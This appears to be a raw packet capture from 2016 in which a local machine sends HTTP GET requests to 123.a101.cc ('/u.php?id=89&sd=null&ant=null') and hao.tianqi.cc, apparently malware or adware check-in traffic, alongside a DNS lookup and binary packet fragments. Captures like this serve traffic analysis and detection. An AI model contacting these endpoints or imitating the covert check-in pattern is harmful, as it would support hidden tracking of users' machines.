E..(9.@…{….fw..e…P….fs.MP…t[……..
2016-10-25 22:56:31.329029 IP 192.168.1.102.60952 > 119.28.13.101.80: Flags [P.], seq 0:302, ack 1, win 258, length 302: HTTP: GET /u.php?id=89&sd=null&ant=null HTTP/1.1
E..V9/@…y….fw..e…P….fs.MP…….GET /u.php?id=89&sd=null&ant=null HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: 123.a101.cc
Connection: Keep-Alive
2016-10-25 22:56:31.612516 IP 192.168.1.102.62225 > 75.75.75.75.53: 36863+ A? hao.tianqi.cc. (31)
E..;.#………fKKKK…5.’.0………….hao.tianqi.cc…..

E..(^.@….q…fy+j …PJ..E….P….}……..
2016-10-25 22:56:43.258630 IP 192.168.1.102.60953 > 121.43.106.9.80: Flags [P.], seq 0:293, ack 1, win 64240, length 293: HTTP: GET /?sd-null-ant-null HTTP/1.1
E..M^.@….K…fy+j …PJ..E….P….,..GET /?sd-null-ant-null HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: hao.tianqi.cc
Connection: Keep-Alive